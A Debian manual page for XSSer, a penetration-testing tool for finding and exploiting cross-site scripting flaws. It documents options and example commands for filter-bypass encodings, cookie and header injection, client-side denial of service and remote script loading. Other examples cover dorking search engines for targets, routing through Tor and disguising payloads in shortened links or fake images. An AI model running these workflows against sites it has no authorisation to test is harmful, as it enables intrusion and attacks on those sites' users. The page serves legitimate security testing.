.\" Debian manual page, has been forwarded upstream
.TH XSSER "10" "Nov 2010"
.SH NAME
XSSer \- Cross Site Scripter framework
.SH SYNOPSIS
.PP
.B XSSer
.SH DESCRIPTION
.PP
XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
.PP
It contains several options to try to bypass certain filters, and various special techniques of code injection.
.PP
.SH INSTALL
.PP
XSSer runs on many platforms. It requires Python and the following libraries:
.PP
    \- python-pycurl - Python bindings to libcurl
.PP
    \- python-beautifulsoup - error-tolerant HTML parser for Python
.PP
    \- python-xml - XML tools for Python
.PP
On Debian-based systems, run: 
.PP
   % sudo apt-get install python-pycurl python-beautifulsoup python-xml
.SH OPTIONS AND FEATURES
.TP
    XSSer [OPTIONS] [\-u <url> |\-i <file> |\-d <dork>] [\-g <get> |\-p <post> |\-c <crawl>] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
.PP
[Options]
.TP
    \fB\-\-version\fR
    show program's version number and exit
.TP
    \fB\-h\fR, \fB\-\-help\fR
    show this help message and exit
.TP
    \fB\-v\fR, \fB\-\-verbose\fR
    verbose (default: no)
.TP
    \fB\-s\fR, 
    show statistics with all injection attempts responses
.TP
    \fB\-w\fR 
    output all results directly to template (XSSlist.dat)
.TP
    \fB\-\-xml\fR=\fIFILEXML\fR
    output 'positives' to aXML file (\-\-xml filename.xml)
.TP
    \fB\-\-publish\fR
    output 'positives' to Social Networks (identi.ca)
.TP
    \fB\-\-short\fR=\fISHORTURLS\fR
    output \-final code\- shortered (tinyurl, is.gd)
.TP
    \fB\-\-imx\fR=\fIIMX\fR
    create a false image with XSS code embedded
.TP
    \fB\-\-fla\fR=\fIFLASH\fR
    create a false .swf file with XSS code embedded
.TP
    \fB\-\-check\fR
    send a hash to pre-check if target repeats all content recieved (usefull to reduce 'false positive' results)
.TP
    \fB\-\-launch\fR
    launch a browser at the end, with each 'positive' final code injection(s) discovered
.TP
[*Select Target(s)*:] 
.PP
At least one of these options has to be specified to set the source to get target(s) urls from. You need to choose to run XSSer:
.TP
    \fB\-u\fR URL\fR, \fB\-\-url\fR=\fIURL\fR
    show program's version number and exit
.TP
    \fB\-i\fR=\fIREADFILE\fR
    Read target urls from a file
.TP
    \fB\-d\fR=\fIDORK\fR
    Process search engine dork results as target urls
.TP
    \fB\-\-De\fR=\fIDORK_ENGINE\fR
    Search engine to use for dorking (duck, altavista,
    bing, baidu, yandex, yebol, youdao, google, yahoo)
.TP
[*Select type of HTTP/HTTPS connection(s)*:] 
.PP
These options can be used to specify which parameter(s) we want to use like payload to inject code.
.TP
    \fB\-g\fR=\fIGET\fR
    Enter payload to audit using GET. (ex: '/menu.php?q=')
.TP
    \fB\-p\fR=\fIPOST\fR
    Enter payload to audit using POST. (ex: 'foo=1&bar=')
.TP
    \fB\-c\fR=\fICRAWLING\fR
    Crawl target hierarchy parameters (can be slow!)
.TP
    \fB\-\-Cw\fR=\fICRAWLER_WIDTH\fR
    Number of urls to visit when crawling (deeping level)
.TP
[*Configure Request(s)*:] 
.PP
These options can be used to specify how to connect to target(s) payload(s). You can select multiple:
.TP
    \fB\-\-cookie\fR=\fICOOKIE\fR
    Change your HTTP Cookie header
.TP
    \fB\-\-user\-agent\fR=\fIAGENT\fR
    Change your HTTP User-Agent header (default SPOOFED)
.TP
    \fB\-\-referer\fR=\fIREFERER\fR
    Use another HTTP Referer header (default NONE)
.TP
    \fB\-\-headers\fR=\fIHEADERS\fR
    Extra HTTP headers newline separated
.TP
    \fB\-\-auth\-type\fR=\fIATYPE\fR
    HTTP Authentication type (value Basic or Digest)
.TP
    \fB\-\-auth\-cred\fR=\fIACRED\fR
    HTTP Authentication credentials (value name:password)
.TP
    \fB\-\-proxy\fR=\fIPROXY\fR
    Use proxy server (tor: http://localhost:8118)
.TP
    \fB\-\-timeout\fR=\fITIMEOUT\fR
    Select your Timeout (default 30)
.TP
    \fB\-\-delay\fR=\fIDELAY\fR
    Delay in seconds between each HTTP request (default 8)
.TP
    \fB\-\-threads\fR=\fITHREADS\fR
    Maximum number of concurrent HTTP requests (default 1)
.TP
    \fB\-\-retries\fR=\fIRETRIES\fR
    Retries when the connection timeouts (default 3)
.TP
[*Select Vector(s)*:] 
.PP
These options can be used to specify a XSS vector source code to inject in each payload. Important, if you don't want to try to inject a common XSS vector, used by default. Choose only one option:
.TP
    \fB\-\-payload\fR=\fISCRIPT\fR
    OWN  \- Insert your XSS construction \-manually\-
.TP
    \fB\-\-auto\fR
    AUTO \- Insert XSSer 'reported' vectors from file
.TP
[*Select Bypasser(s)*:]
.PP 
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it. Also, can be combined with other techniques to provide encoding:
.TP
    \fB\-\-Str\fR
    Use method String.FromCharCode()
.TP
    \fB\-\-Une\fR
    Use function Unescape()
.TP
    \fB\-\-Mix\fR
    Mix String.FromCharCode() and Unescape()
.TP
    \fB\-\-Dec\fR
    Use Decimal encoding
.TP
    \fB\-\-Hex\fR
    Use Hexadecimal encoding
.TP
    \fB\-\-Hes\fR
    Use Hexadecimal encoding, with semicolons
.TP
    \fB\-\-Dwo\fR
    Encode vectors IP addresses in DWORD
.TP
    \fB\-\-Doo\fR
    Encode vectors IP addresses in Octal
.TP
    \fB\-\-Cem\fR=\fICEM\fR
    Try -manually- different Character Encoding mutations
    (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
.TP
[*Special Techniques(s)*:] 
.PP    
These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
.TP
    \fB\-\-Coo\fR
    COO - Cross Site Scripting Cookie injection
.TP
    \fB\-\-Xsa\fR
    XSA - Cross Site Agent Scripting
.TP
    \fB\-\-Xsr\fR
    XSR - Cross Site Referer Scripting
.TP
    \fB\-\-Dcp\fR
    DCP - Data Control Protocol injections
.TP
    \fB\-\-Dom\fR
    DOM - Use Anchor Stealth (DOM shadows!)
.TP
[*Select Final Injection(s)*:] 
.PP
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities. Choose only one option:
.TP
    \fB\-\-Fp\fR=\fIFINALPAYLOAD\fR
    OWN    - Insert your final code to inject -manually-
.TP
    \fB\-\-Fr\fR=\fIFINALREMOTE\fR
    REMOTE - Insert your final code to inject -remotelly-
.TP
    \fB\-\-B64\fR
    B64    - Base64 code encoding in META tag (rfc2397)
.TP
    \fB\-\-Dos\fR
    DOS    - XSS Denial of service (client) attack!!
.TP
[*Special Final Injection(s)*:] 
.PP
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code:
.TP
    \fB\-\-Onm\fR
    ONM - Use onMouseMove() event to inject code
.TP
    \fB\-\-Ifr\fR
    IFR - Use <iframe> source tag to inject code
.PP
.SH EXAMPLES OF USAGE
.PP
.PP
* Simple injection from URL:
.PP
$ python XSSer.py \-u "http://host.com"
.PP
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
.PP
$ python XSSer.py \-i "file.txt" \-\-proxy "http://127.0.0.1:8118" \-\-referer "666.666.666.666"
.PP
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
.PP
$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
.PP
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
.PP
$ python XSSer.py \-u "http://host.com" \-\-auto \-\-Cem "Hex,Str,Hex" \-\-user\-agent "XSSer!!" \-\-timeout "20" \-\-threads "5"
.PP
* Advance injection from File, payloading your \-own\- payload and using Unescape() character encoding to bypass filters:
.PP
$ python XSSer.py \-i "urls.txt" \-\-payload 'your_script_here' \-\-Une
.PP
* Injection from Dork selecting "duck" engine (XSSer Storm!):
.PP
$ python XSSer.py \-\-De "duck" \-d "search.php?"
.PP
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
.PP
$ python XSSer.py \-c3 \-\-Cw=4 \-u "http://host.com"
.PP
* Simple injection from URL, using POST, with statistics results:
.PP
$ python XSSer.py \-u "http://host.com" \-p "index.php?target=search&subtarget=top&searchstring=" \-s
.PP
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):
.PP
$ python XSSer.py \-u "http://host.com" \-g "bs/?q=" \-\-auto \-\-Doo \-\-short tinyurl
.PP
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):
.PP
$ python XSSer.py \-u "http://host.com" \-g "bs/?q=" \-\-Coo \-\-Anchor \-\-Fr="!enter your final injection code here!"
.PP
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:
.PP
$ python XSSer.py \-u "http://host.com" \-g "bs/?q=" \-\-Dos \-\-short "is.gd"
.PP
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer\-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links(tinyurl) of any valid injecting payloads found. (real playing mode!):
.PP
$ python XSSer.py \-i "list_of_url_targets.txt" \-\-auto \-\-timeout "20" \-\-threads "5" \-\-delay "10" \-\-Xsa \-\-Xsr \-\-Coo \-\-proxy "http://127.0.0.1:8118" \-\-Doo \-s \-\-verbose \-\-Dos \-\-short "tinyurl"
.PP
* Injection of user XSS vector directly in a malicious \-fake\- image created "on the wild", and ready to be uploaded.
.PP
$ python XSSer.py \-\-Imx "test.png" --payload "!enter your malicious injection code here!"
.PP
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
.PP
$ python XSSer.py \-d "login.php" \-\-De "ask" \-\-xml "security_report_XSSer_Dork_cuil.xml"
.PP
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet)
.PP
$ python XSSer.py \-d "login.php" \-\-De "duck" \-\-publish
.PP
* Examples online:
.TP
    - http://identi.ca/xsserbot01
.PP
* Create a .swf movie with XSS code injected
.PP
$ python XSSer.py \-\-imx "name_of_file"
.PP
* Send a pre\-checking hash to see if target will generate \-false positive\- results
.PP
$ python XSSer.py \-u "host.com" \-\-check
.PP
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real\-time exploiting.
.PP
$ python XSSer.py \-u "host.com" \-\-auto \-\-Dcp \-\-Fp "enter_your_code_here" \-\-short "is.gd"
.PP
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
.PP
$ python XSSer.py \-u "host.com" \-g "vulnerable_path" \-\-payload "valid_vector_injected" \-\-B64
.PP
* Exploiting our "own" \-remote code\- in a payload discovered using fuzzing and launch it in a browser directly
.PP
$ python XSSer.py \-u "host.com" \-g "vulnerable_path" \-\-auto \-\-Fr "my_host/path/code.js" \-\-launch
.PP
.SH CONTRIBUTE
.PP
If you want to contribute to XSSer development reporting a bug, providing a patch, commenting on the code base or simply need to find help to run XSSer first refer to the xsser documentation, then surf the xsser mailing list (Xsser\-users@lists.sourceforge.net) online archives and if you still have something to say, do that on the appropriate xsser mailing list. If nobody gets back to you, then drop me an e\-mail (root@lordepsylon.net \- epsylon@riseup.net).
.PP
If you discover any vulnerability in a software using XSSer, please add to the report a link to this site.
.PP
.SH COPYRIGHT
.PP
Copyright © 2008 Free Software Foundation, Inc.   License  GPLv3+:  GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This  is  free  software:  you  are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
.SH SEE ALSO
.PP
.BR top (1)
.SH AUTHOR
.PP
XSSer was written by R.C.Mérida (psy)
